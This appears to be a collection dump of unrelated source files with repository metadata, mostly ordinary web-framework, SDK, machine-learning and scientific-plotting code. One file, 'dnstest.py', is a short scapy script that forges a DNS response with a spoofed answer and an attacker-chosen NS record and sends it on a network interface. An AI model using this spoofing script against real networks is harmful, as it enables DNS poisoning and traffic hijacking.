AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
# NOTE(review): 'ko-ke' is not a standard language code -- 'ko-kr' (Korean,
# South Korea) was probably intended; confirm.
LANGUAGE_CODE = 'ko-ke'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
    BASE_DIR / 'static',
]
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"sglee487@gmail.com"
] | sglee487@gmail.com |
a2eb2f15d648514d2fb306b3dfc4f32265613857 | 19236d9e966cf5bafbe5479d613a175211e1dd37 | /cohesity_management_sdk/models/tenant_view_update_details.py | 4bfe6d01532e5630f8534fce69d0d7d939816cd2 | [
"MIT"
] | permissive | hemanshu-cohesity/management-sdk-python | 236c44fbd9604809027f8ddd0ae6c36e4e727615 | 07c5adee58810979780679065250d82b4b2cdaab | refs/heads/master | 2020-04-29T23:22:08.909550 | 2019-04-10T02:42:16 | 2019-04-10T02:42:16 | 176,474,523 | 0 | 0 | NOASSERTION | 2019-03-19T09:27:14 | 2019-03-19T09:27:12 | null | UTF-8 | Python | false | false | 1,613 | py | # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
class TenantViewUpdateDetails(object):

    """Implementation of the 'Tenant View Update Details.' model.

    Specifies view update details about a tenant.

    Attributes:
        tenant_id (string): Specifies the unique id of the tenant.
        view_names (list of string): Specifies the PolicyIds for respective
            tenant.

    """

    # Maps model attribute names to the wire (API JSON) property names.
    _names = {
        "tenant_id": 'tenantId',
        "view_names": 'viewNames'
    }

    def __init__(self, tenant_id=None, view_names=None):
        """Constructor for the TenantViewUpdateDetails class"""
        self.tenant_id = tenant_id
        self.view_names = view_names

    @classmethod
    def from_dictionary(cls, dictionary):
        """Build an instance from a deserialized API response dictionary.

        Args:
            dictionary (dict): Keys must match the API property names
                ('tenantId', 'viewNames'); missing keys default to None.

        Returns:
            TenantViewUpdateDetails or None: None when `dictionary` is None.
        """
        if dictionary is None:
            return None
        return cls(tenant_id=dictionary.get('tenantId'),
                   view_names=dictionary.get('viewNames'))
| [
"ashish@cohesity.com"
] | ashish@cohesity.com |
8a4d3531c5aca0cc15b6816c3e76e0f611e2404c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02408/s132954082.py | adf3cae7f1f026a2ec83181f0895f2eaa43eaf7f | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | suit = {"S": 0, "H": 1, "C": 2, "D": 3}
# Rebuild the full 52-card deck in the fixed suit order S, H, C, D
# (sorting the suit dict's keys by their mapped index).
suit_keys = sorted(suit, key=suit.get)
deck = [["{} {}".format(mark, rank) for rank in range(1, 14)] for mark in suit_keys]
# Blank out every card listed in the input.
for _ in range(int(input())):
    card = input().split()
    deck[suit[card[0]]][int(card[1]) - 1] = ""
# Print whatever remains, suit by suit, ranks ascending.
for row in deck:
    for label in row:
        if label != "":
            print(label)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
75735120139c7430867a75bdaa0c5d627ceee1c6 | 2a6f6cc148cbccb55c826bf01e0159ef58a733ec | /train_script_TFR.py | b530c0917e7daaab9900ae33b730b0b625a92c6e | [] | no_license | QuantumPlumber/CookieBoxMachineLearning | 5e9a4ebf385aa40373d4d5dbc1020b40dc06500f | dfc60bb9b29d519618d59b10f9acae058f368e17 | refs/heads/master | 2022-11-21T20:13:52.507033 | 2019-09-19T02:09:00 | 2019-09-19T02:09:00 | 168,767,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | import numpy as np
import time
# Alternative TFRecord dataset basenames, kept commented for quick switching:
#base_filename = 'reformed_TF_train_mp_1_quarter'
#base_filename = 'TF_train_update_TFR'
#base_filename = 'TF_train_waveform_TFR'
#base_filename = 'TF_train_wave_unwrapped_TFR'
base_filename = 'TF_train_wave_unwrapped_eggs_TFR'
dataset_size = 60000  # upper bound for shard chunking; also scales train steps below
TFR_filesize = 10000  # examples per TFRecord shard (chunking step below)
def file_chunker(start, stop, step, base_filename):
    """Yield shard names '<base>_<lo>-<lo+step>' covering [start, stop) in steps of `step`."""
    for chunk_start in np.arange(start, stop, step):
        chunk_stop = chunk_start + step
        yield '{}_{}-{}'.format(base_filename, chunk_start, chunk_stop)
# Materialise the shard names once (printed for a sanity check).
file_chunks = file_chunker(start=0, stop=dataset_size, step=TFR_filesize, base_filename=base_filename)
file_list = list(file_chunks)
print(file_list)
repeat = 2       # epochs over the dataset
batch_size = 64
train_step = dataset_size*repeat
checkpoint = time.perf_counter()
# NOTE(review): `classifier` and `fn` are not defined in this script; they are
# presumably provided by the surrounding session/notebook -- confirm.
classifier.train(
    input_fn=lambda: fn.input_TFR_functor(TFRecords_file_list=file_list, long=TFR_filesize, repeat=repeat, batch_size=batch_size),
    steps=train_step)
# BUG FIX: elapsed time is now - checkpoint; the original computed
# `checkpoint - time.perf_counter()`, which printed a negative duration.
delta_t = time.perf_counter() - checkpoint
print('Trained {} epochs in {}'.format(repeat, delta_t))
| [
"44450703+QuantumPlumber@users.noreply.github.com"
] | 44450703+QuantumPlumber@users.noreply.github.com |
286662ec2018c9f32e6fb986fc832bc0ab1dc3cf | 5e8931a6bb8b883b9e2f4979ad4b469eabece11f | /appfat/blog/migrations/0011_auto_20180801_1543.py | 50fa24c12e04c6bad3e71a7fc5e11be56c9df76a | [] | no_license | dennyerikson/django-AppFat | accbfe232ab3895d39ee2ba2af69baff55d2986c | 476a821aba1aff7c4a3bea0dbafa03e145eb6325 | refs/heads/master | 2020-03-22T20:17:01.080648 | 2019-01-06T23:40:12 | 2019-01-06T23:40:12 | 140,586,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-08-01 18:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by `makemigrations` (Django 1.9.13); applied migrations
    # should not be edited by hand.
    # Must run after the previous blog migration (0010).
    dependencies = [
        ('blog', '0010_auto_20180727_1711'),
    ]
    # Redefines Aluno.alu_curso as models.CharField(max_length=200).
    operations = [
        migrations.AlterField(
            model_name='aluno',
            name='alu_curso',
            field=models.CharField(max_length=200),
        ),
    ]
| [
"dennyeriks00on@gmail.com"
] | dennyeriks00on@gmail.com |
dd0d4b267638c32c16c41ea77a4ed9f1a38c0773 | 6db1b8b05c6a4fb68f8514f07bc5725e881691ee | /test/test_updating_a_mailing_list_request.py | 80ee367c3265a652b4858a6e670f1b0dc9e0f7e6 | [] | no_license | mooTheo/Python-Moosend-Wrapper | 7cc776dc90a78484b605d33b6e0403fee27f99ac | eaf3b5f82960aef5dfd4201026e57e88ad663005 | refs/heads/master | 2021-07-07T20:55:32.994324 | 2017-10-03T14:17:42 | 2017-10-03T14:17:42 | 104,724,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 933 | py | # coding: utf-8
"""
Moosend API
TODO: Add a description
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import moosend
from moosend.rest import ApiException
from moosend.models.updating_a_mailing_list_request import UpdatingAMailingListRequest
class TestUpdatingAMailingListRequest(unittest.TestCase):
    """Unit-test stubs for the UpdatingAMailingListRequest model."""

    def setUp(self):
        """No fixtures required yet."""
        pass

    def tearDown(self):
        """Nothing to clean up."""
        pass

    def testUpdatingAMailingListRequest(self):
        """Placeholder: exercise UpdatingAMailingListRequest construction."""
        # FIXME: construct object with mandatory attributes with example values
        # model = moosend.models.updating_a_mailing_list_request.UpdatingAMailingListRequest()
        pass
# Allow running this test module directly with the unittest CLI.
if __name__ == '__main__':
    unittest.main()
| [
"theo@moosend.com"
] | theo@moosend.com |
30f4e4a5a110d3d3199fca57cbf4ebf05170115b | 6b8c52048648c82543ce899d5fb2f8b0dcabb6e5 | /heaps/misha&candies.py | fb7d4cc3ccfeafc3f4ba12ef01e7c2e4167e6994 | [] | no_license | arnabs542/DS-AlgoPrac | c9f7f0d383bcb3b793b09b219135f1bc9d607081 | fcc2d6d014e9ffdce3ff4b64d12ce054222e434d | refs/heads/master | 2022-12-13T05:56:33.098629 | 2020-09-15T13:48:54 | 2020-09-15T13:48:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,864 | py | """Misha and Candies
Misha loves eating candies. She has given N boxes of Candies. She decides, every time she will choose a box having the minimum number of candies, eat half of the candies and put the remaining candies in the other box that has the minimum number of candies. Misha does not like a box if it has the number of candies greater than K so she won't eat from that box. Can you find how many candies she will eat? Note: If a box has an odd number of candies then Misha will eat floor(odd/2)
Input Format
The first argument is A an Array of Integers, where A[i] is the number of candies in the ith box.
The second argument is K, the maximum number of candies Misha like in a box.
Output Format
Return an Integer X i.e number of candies Misha will eat.
Constraints
1 <= N <= 1e5
1 <= A[i] <= 1e5
1 <= K <= 1e6
For Example
Example Input:
A = [3, 2, 3]
k = 4
Example Output:
2
Explanation:
1st time Misha will eat from 2nd box, i.e 1 candy she'll eat and will put the remaining 1 candy in the 1st box.
2nd time she will eat from the 3rd box, i.e 1 candy she'll eat and will put the remaining 2 candies in the 1st box.
She will not eat from the 3rd box as now it has candies greater than K.
So the number of candies Misha eat is 2."""
class Solution:
    # @param A : list of integers (candies per box)
    # @param B : integer (K, the largest box Misha still likes)
    # @return an integer (total candies eaten)
    def solve(self, A, B):
        """Simulate Misha eating candies and return how many she eats.

        Repeatedly take the box with the fewest candies.  If it holds more
        than B candies she stops; otherwise she eats floor(half) and the
        remaining ceil(half) candies are poured into the next-smallest box.

        O(n log n) via a min-heap.  Fixes over the original: the input list
        is copied instead of being heapified in place (so the caller's list
        is left untouched), and the builtin name `next` is no longer
        shadowed.
        """
        if not A:
            return 0
        import heapq as hq
        boxes = list(A)  # copy: don't mutate the caller's list
        hq.heapify(boxes)
        eaten = 0
        while boxes:
            smallest = hq.heappop(boxes)
            if smallest > B:  # Misha dislikes this box; she is done
                return eaten
            half = smallest // 2  # floor(odd/2) per the problem statement
            eaten += half
            if not boxes:  # no other box to pour the remainder into
                return eaten
            # Pour the leftover ceil(half) candies into the (new) smallest box.
            other = hq.heappop(boxes)
            hq.heappush(boxes, other + (smallest - half))
        return eaten
return ans | [
"vvrmahendra@gmail.com"
] | vvrmahendra@gmail.com |
ab8e5e33a928ac00940e2bd2a5eafe5e661de615 | c130a094e04eb448201ca2ab8ed4fe56cd1d80bc | /samples/openapi3/client/petstore/python-experimental/petstore_api/model/object_with_difficultly_named_props.py | 2429a2205a21853b42e39fce88ac749973f708a0 | [
"Apache-2.0"
] | permissive | janweinschenker/openapi-generator | 83fb57f9a5a94e548e9353cbf289f4b4172a724e | 2d927a738b1758c2213464e10985ee5124a091c6 | refs/heads/master | 2022-02-01T17:22:05.604745 | 2022-01-19T10:43:39 | 2022-01-19T10:43:39 | 221,860,152 | 1 | 0 | Apache-2.0 | 2019-11-15T06:36:25 | 2019-11-15T06:36:24 | null | UTF-8 | Python | false | false | 2,307 | py | # coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
import typing # noqa: F401
from frozendict import frozendict # noqa: F401
import decimal # noqa: F401
from datetime import date, datetime # noqa: F401
from frozendict import frozendict # noqa: F401
from petstore_api.schemas import ( # noqa: F401
AnyTypeSchema,
ComposedSchema,
DictSchema,
ListSchema,
StrSchema,
IntSchema,
Int32Schema,
Int64Schema,
Float32Schema,
Float64Schema,
NumberSchema,
DateSchema,
DateTimeSchema,
DecimalSchema,
BoolSchema,
BinarySchema,
NoneSchema,
none_type,
InstantiationMetadata,
Unset,
unset,
ComposedBase,
ListBase,
DictBase,
NoneBase,
StrBase,
IntBase,
NumberBase,
DateBase,
DateTimeBase,
BoolBase,
BinaryBase,
Schema,
_SchemaValidator,
_SchemaTypeChecker,
_SchemaEnumMaker
)
class ObjectWithDifficultlyNamedProps(
DictSchema
):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
model with properties that have invalid names for python
"""
_required_property_names = set((
'123-list',
))
special_property_name = Int64Schema
locals()['$special[property.name]'] = special_property_name
del locals()['special_property_name']
_123_list = StrSchema
locals()['123-list'] = _123_list
del locals()['_123_list']
_123_number = IntSchema
locals()['123Number'] = _123_number
del locals()['_123_number']
def __new__(
cls,
*args: typing.Union[dict, frozendict, ],
_instantiation_metadata: typing.Optional[InstantiationMetadata] = None,
**kwargs: typing.Type[Schema],
) -> 'ObjectWithDifficultlyNamedProps':
return super().__new__(
cls,
*args,
_instantiation_metadata=_instantiation_metadata,
**kwargs,
)
| [
"noreply@github.com"
] | janweinschenker.noreply@github.com |
e2b778c0ffee1ffdb0c49fc77cd4f43080f142f5 | d1944798306dab0d4e591d1522f6172fab36db3c | /0x03-python-data_structures/0-print_list_integer.py | fa7e7d395533a8174b4bab1d9641ef7059fea32d | [] | no_license | Fares84/holbertonschool-higher_level_programming | 775dc73abbc5cef89c7ea6835d99db5a7a9313c3 | 1a7527b6f140ac441dcc2506a77c858cdcd09be4 | refs/heads/master | 2023-05-03T10:41:07.945582 | 2021-05-15T12:36:10 | 2021-05-15T12:36:10 | 319,332,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | #!/usr/bin/python3
def print_list_integer(my_list=[]):
for i in my_list:
print("{:d}".format(i))
| [
"fares.sassi2015@gmail.com"
] | fares.sassi2015@gmail.com |
e56902c26f13b52578ca430af1c005065ee503e9 | 28b9adc46eb9bb7616c4f74fe29f9a3417f2f963 | /SIM_PKL/catatan/models.py | 2cb3c0434d4c040bf64928b425a3d0f9c25523bb | [] | no_license | mohamad1213/SIMPKL | ca0a6dafb97b494e5edf9276e358f800eee808e1 | e6ef5d6b8a5c18c85067314a3664bf43959a0370 | refs/heads/master | 2023-01-04T18:27:06.306534 | 2020-11-03T06:53:50 | 2020-11-03T06:53:50 | 297,674,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | from django.db import models
from datetime import datetime
from django.contrib.auth.models import User
class Catatan(models.Model):
owner = models.ForeignKey(User, on_delete = models.DO_NOTHING,related_name='catatan')
tgl_kegiatan = models.DateField(default=datetime.now)
judul = models.CharField(max_length=100)
ket = models.TextField(max_length=200)
upload_img = models.ImageField(default='', upload_to='images/')
| [
"hatami391998@gmail.com"
] | hatami391998@gmail.com |
24da05951cd9db1b073a0188ea67b0faf41a421c | 1c321bd2ca285625fe89e62519b04d26aaf83060 | /networking/dns/dnstest.py | 364fc028e848290c48f3c33d41c1ad212ea69638 | [] | no_license | w31ha0/hackTools | e554706a755102113a644b62b6816585c02570b5 | f133a96ed1922dce0c0758110ba93aedef0e61fd | refs/heads/master | 2021-01-21T12:36:02.581405 | 2018-04-23T06:54:05 | 2018-04-23T06:54:05 | 91,798,452 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | #!/usr/bin/env python
# This code is strictly for demonstration purposes.
# If used in any other way or for any other purposes. In no way am I responsible
# for your actions or any damage which may occur as a result of its usage
# dnsSpoof.py
# Author: Nik Alleyne - nikalleyne at gmail dot com
# http://securitynik.blogspot.com
from os import uname
from subprocess import call
from sys import argv, exit
from time import ctime, sleep
from scapy.all import *
spoofedIPPkt = IP(src='1.2.3.4',dst='1.2.3.4')
spoofedUDP_TCPPacket = UDP(sport=53,dport=123)
spoofedDNSPakcet = DNS(id=1,qr=1,opcode=1,aa=1,rd=0,ra=0,z=0,rcode=0,qdcount=1,ancount=1,nscount=1,arcount=1,qd=DNSQR(qname="google.com",qtype=1,qclass=1),an=DNSRR(rrname="google.com",rdata='1.1.1.1',ttl=86400),ns=DNSRR(rrname="google.com",type=2,ttl=86400,rdata=argv[2]),ar=DNSRR(rrname="google.com",rdata='1.1.1.1'))
pckToSend = Ether()/spoofedIPPkt/spoofedUDP_TCPPacket/spoofedDNSPakcet
sendp(pckToSend,iface=argv[1].strip(), count=1)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
bde8f107575dc263a831f0089ca35d8a3d5bb93f | d001abba19711d678f2ba09dfbd5c84357be6bb0 | /src/contest/yukicoder/280/B.py | 025b75bdeffc6dfe7b3305220a7944a2bbfcf387 | [] | no_license | cormoran/CompetitiveProgramming | 89f8b3ceda97985d32b8cd91056b49abeb243e6f | fa0e479ab299f53984fa7541d088c10c447fb6e4 | refs/heads/master | 2020-04-17T19:59:49.724498 | 2020-03-28T15:46:26 | 2020-03-28T15:46:26 | 65,995,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py | #!/usr/bin/env python3
import fractions
N = int(input())
Z = list(map(int, input().split()))
G = fractions.Fraction(1, 1);
for i in range(N - 1):
G *= fractions.Fraction(Z[i + 1], Z[i])
print(str(G.numerator) + '/' + str(G.denominator))
| [
"cormoran707@gmail.com"
] | cormoran707@gmail.com |
c5061c88d417dc3ff636d5051915df0c3f4e6865 | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /src/datadog_api_client/v1/model/table_widget_definition_type.py | 41754b3fe02824bdb701f7c9092457b96605e51b | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 882 | py | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from __future__ import annotations
from datadog_api_client.model_utils import (
ModelSimple,
cached_property,
)
from typing import ClassVar
class TableWidgetDefinitionType(ModelSimple):
"""
Type of the table widget.
:param value: If omitted defaults to "query_table". Must be one of ["query_table"].
:type value: str
"""
allowed_values = {
"query_table",
}
QUERY_TABLE: ClassVar["TableWidgetDefinitionType"]
@cached_property
def openapi_types(_):
return {
"value": (str,),
}
TableWidgetDefinitionType.QUERY_TABLE = TableWidgetDefinitionType("query_table")
| [
"noreply@github.com"
] | DataDog.noreply@github.com |
b41ef3fee8820ab56138281c31348d0908d77313 | 92699c30f0ef36e6c76024c0966ad453bcd4e893 | /visualize.py | 73277a64915b433240deaf1f2365582459b10188 | [
"MIT"
] | permissive | AungMyatSan/unsup-3d-keypoints | c333b71216087d01e219288969a2dcaae9257ead | 93af69ba92bb00d1d2785967055df30ac745f95c | refs/heads/main | 2023-08-25T20:09:11.010042 | 2021-11-03T15:57:52 | 2021-11-03T15:57:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | from experiments import algo_registry, get_args
if __name__ == '__main__':
args = get_args()
experiment = algo_registry[args.algo](args)
experiment.visualize()
| [
"boyuanchen@berkeley.edu"
] | boyuanchen@berkeley.edu |
b84e495770b8be41ab78265bf2524294bb4b5a9b | f64d4fbc4c5b206ca0c4d05ff5eb13aa8d6b0f22 | /temperature-dependency/quick-plots.py | 0a9f90cd7c0566a37cadcedcbb67ac7fdef056f1 | [
"BSD-3-Clause"
] | permissive | mirams/hERGRapidCharacterisation | 66e4d9a57df29c36bc268efce7eeb7b3a9011781 | db838a354bf49f953d5ae36d33a94498a4c01dea | refs/heads/master | 2022-12-31T02:52:15.373956 | 2019-07-18T13:17:58 | 2019-07-18T13:17:58 | 203,183,652 | 0 | 0 | BSD-3-Clause | 2019-08-19T13:57:51 | 2019-08-19T13:57:48 | null | UTF-8 | Python | false | false | 10,653 | py | #!/usr/bin/env python2
from __future__ import print_function
import sys
sys.path.append('../lib')
import os
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import protocols
import model_ikr as m
from releakcorrect import I_releak, score_leak, protocol_leak_check
from scipy.optimize import fmin
savedir = './figs'
if not os.path.isdir(savedir):
os.makedirs(savedir)
data_dir_staircase = '../data'
data_dir = '../data-autoLC'
file_dir = './out'
file_list = [
'herg25oc1',
'herg27oc1',
'herg30oc1',
'herg33oc1',
'herg37oc3',
]
temperatures = np.array([25.0, 27.0, 30.0, 33.0, 37.0])
temperatures += 273.15 # in K
fit_seed = 542811797
#
# Protocol info
#
protocol_funcs = {
'staircaseramp': protocols.leak_staircase,
'pharma': protocols.pharma, # during drug application
'apab': 'protocol-apab.csv',
'apabv3': 'protocol-apabv3.csv',
'ap05hz': 'protocol-ap05hz.csv',
'ap1hz': 'protocol-ap1hz.csv',
'ap2hz': 'protocol-ap2hz.csv',
'sactiv': protocols.sactiv,
'sinactiv': protocols.sinactiv,
}
protocol_dir = '../protocol-time-series'
protocol_list = [
'staircaseramp',
'sactiv',
'sinactiv',
'pharma',
'apab',
'apabv3',
'ap05hz',
'ap1hz',
'ap2hz',
]
prt_ylim = [
(-1500, 2250),
(-0.025, 1.025),
(-3.25, 1.025),
(-250, 2250),
(-250, 2250),
(-250, 2250),
(-250, 2250),
(-250, 2250),
(-250, 2250),
]
prt_ylim = [
(-0.02, 0.04),
(-0.025, 1.025),
(-3.25, 1.025),
(-0.005, 0.04),
(-0.005, 0.04),
(-0.005, 0.04),
(-0.005, 0.04),
(-0.005, 0.04),
(-0.005, 0.04),
]
# IV protocol special treatment
protocol_iv = [
'sactiv',
'sinactiv',
]
protocol_iv_times = {
'sactiv': protocols.sactiv_times,
'sinactiv': protocols.sinactiv_times,
}
protocol_iv_convert = {
'sactiv': protocols.sactiv_convert,
'sinactiv': protocols.sinactiv_convert,
}
protocol_iv_args = {
'sactiv': protocols.sactiv_iv_arg,
'sinactiv': protocols.sinactiv_iv_arg,
}
protocol_iv_v = {
'sactiv': protocols.sactiv_v,
'sinactiv': protocols.sinactiv_v,
}
# Eyring and Q10
from temperature_models import eyringA, eyringB, eyringG, eyringT
from temperature_models import q10A, q10B, q10G, q10T
from temperature_models import eyring_transform_to_model_param
eyring_mean = np.loadtxt('%s/eyring-mean.txt' % file_dir)
eyring_std = np.loadtxt('%s/eyring-std.txt' % file_dir)
q10_mean = np.loadtxt('%s/q10-mean.txt' % file_dir)
q10_std = np.loadtxt('%s/q10-std.txt' % file_dir)
# Model
prt2model = {}
for prt in protocol_list:
protocol_def = protocol_funcs[prt]
if type(protocol_def) is str:
protocol_def = '%s/%s' % (protocol_dir, protocol_def)
prt2model[prt] = m.Model('../mmt-model-files/kylie-2017-IKr.mmt',
protocol_def=protocol_def,
temperature=temperatures[0], # K
transform=None,
useFilterCap=False) # ignore capacitive spike
# Plot
for i_prt, prt in enumerate(protocol_list):
fig, axes = plt.subplots(2, len(temperatures), figsize=(16, 6))
print('Plotting', prt)
# Time point
times = np.loadtxt('%s/%s-%s-times.csv' % (data_dir, 'herg25oc1',
prt), delimiter=',', skiprows=1)
# Protocol
model = prt2model[prt]
if prt not in protocol_iv:
times_sim = np.copy(times)[::5]
voltage = model.voltage(times) * 1000
else:
times_sim = protocol_iv_times[prt](times[1] - times[0])
voltage = model.voltage(times_sim) * 1000
voltage, t = protocol_iv_convert[prt](voltage, times_sim)
assert(np.mean(np.abs(t - times)) < 1e-8)
# Temperatures
for i_T, T in enumerate(temperatures):
axes[0, i_T].set_title(r'T = %s$^o$C' % (T - 273.15))
if prt not in protocol_iv:
axes[0, i_T].plot(times, voltage, c='#7f7f7f')
else:
for i in range(voltage.shape[1]):
axes[0, i_T].plot(times, voltage[:, i], c='#696969')
file_name = file_list[i_T]
selectedfile = './manualselection/manualselected-%s.txt' % (file_name)
selectedwell = []
with open(selectedfile, 'r') as f:
for l in f:
if not l.startswith('#'):
selectedwell.append(l.split()[0])
print('Getting', file_name)
if i_T < 4:
selectedwell = selectedwell[:50]
# Eyring parameters
np.random.seed(int(T)) # 'different cell at different T'
eyring_T_mean = eyringT(eyring_mean, T)
eyring_T_std = eyringT(eyring_std, T)
eyring_param = np.random.normal(eyring_T_mean, eyring_T_std,
size=(len(selectedwell), len(eyring_mean)))
eyring_model_param = eyring_transform_to_model_param(
eyring_param.T, T).T
# Q10 parameters
np.random.seed(int(T)) # 'different cell at different T'
q10_T_mean = q10T(q10_mean, T)
q10_T_std = q10T(q10_std, T)
q10_param = np.random.normal(q10_T_mean, q10_T_std,
size=(len(selectedwell), len(q10_mean)))
q10_model_param = eyring_transform_to_model_param(q10_param.T, T).T
for i_cell, cell in enumerate(selectedwell):
# Data
if prt == 'staircaseramp':
data = np.loadtxt('%s/%s-%s-%s.csv' % (data_dir_staircase,
file_name, prt, cell), delimiter=',', skiprows=1)
elif prt not in protocol_iv:
data = np.loadtxt('%s/%s-%s-%s.csv' % (data_dir, file_name,
prt, cell), delimiter=',', skiprows=1)
# Set seed
np.random.seed(101)
# Re-leak correct the leak corrected data...
g_releak = fmin(score_leak, [0.0], args=(data, voltage, times,
protocol_leak_check[prt]), disp=False)
data = I_releak(g_releak[0], data, voltage)
else:
data = np.loadtxt('%s/%s-%s-%s.csv' % (data_dir, file_name,
prt, cell), delimiter=',', skiprows=1)
for i in range(data.shape[1]):
# Set seed
np.random.seed(101)
g_releak = fmin(score_leak, [0.0], args=(data[:, i],
voltage[:, i], times,
protocol_leak_check[prt]), disp=False)
data[:, i] = I_releak(g_releak[0], data[:, i],
voltage[:, i])
assert(len(data) == len(times))
# Fitted parameters
param_file = '%s/%s/%s-staircaseramp-%s-solution-%s.txt' % \
(file_dir, file_name, file_name, cell, fit_seed)
parameters = np.loadtxt(param_file)
# Plot
if prt in protocol_iv:
iv_v = protocol_iv_v[prt]() * 1000 # mV
iv_i = protocols.get_corrected_iv(data, times,
*protocol_iv_args[prt]())
axes[1, i_T].plot(iv_v, iv_i / np.max(iv_i), lw=0.4, alpha=0.5,
c='C0', zorder=0)
else:
axes[1, i_T].plot(times, data / parameters[0], alpha=0.5,
lw=0.3, c='C0', zorder=0)
# Individual fit
simulation = model.simulate(parameters, times_sim)
if prt in protocol_iv:
simulation, t = protocol_iv_convert[prt](simulation, times_sim)
assert(np.mean(np.abs(t - times)) < 1e-8)
iv_v = protocol_iv_v[prt]() * 1000 # mV
iv_i = protocols.get_corrected_iv(simulation, times,
*protocol_iv_args[prt]())
axes[1, i_T].plot(iv_v, iv_i / np.max(iv_i), lw=0.4, alpha=0.5,
c='C1', zorder=1)
else:
axes[1, i_T].plot(times_sim, simulation / parameters[0],
alpha=0.5, lw=0.4, c='C1', zorder=1)
# Eyring
eyring_sim = model.simulate(eyring_model_param[i_cell], times_sim)
if prt in protocol_iv:
eyring_sim, t = protocol_iv_convert[prt](eyring_sim, times_sim)
assert(np.mean(np.abs(t - times)) < 1e-8)
iv_v = protocol_iv_v[prt]() * 1000 # mV
iv_i = protocols.get_corrected_iv(eyring_sim, times,
*protocol_iv_args[prt]())
axes[1, i_T].plot(iv_v, iv_i / np.max(iv_i), lw=0.4, alpha=0.5,
c='C2', zorder=2, label='Eyring')
else:
axes[1, i_T].plot(times_sim,
eyring_sim / eyring_model_param[i_cell][0],
alpha=0.5, lw=0.4, c='C2', zorder=2,
label='Eyring')
# Q10
q10_sim = model.simulate(q10_model_param[i_cell], times_sim)
if prt in protocol_iv:
q10_sim, t = protocol_iv_convert[prt](q10_sim, times_sim)
assert(np.mean(np.abs(t - times)) < 1e-8)
iv_v = protocol_iv_v[prt]() * 1000 # mV
iv_i = protocols.get_corrected_iv(q10_sim, times,
*protocol_iv_args[prt]())
axes[1, i_T].plot(iv_v, iv_i / np.max(iv_i), lw=0.4, alpha=0.5,
c='C3', zorder=3, label='Q10')
axes[1, i_T].grid()
else:
axes[1, i_T].plot(times_sim,
q10_sim / q10_model_param[i_cell][0],
alpha=0.5, lw=0.4, c='C3', zorder=3,
label='Q10')
axes[1, i_T].set_ylim(prt_ylim[i_prt])
# Save fig
axes[1, 2].set_xlabel('Time [s]')
axes[0, 0].set_ylabel('Voltage [mV]')
axes[1, 0].set_ylabel('Current [pA]')
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
plt.savefig('%s/quick-plots/%s.png' % (savedir, prt), bbox_iches='tight')
plt.close('all')
| [
"chonloklei@gmail.com"
] | chonloklei@gmail.com |
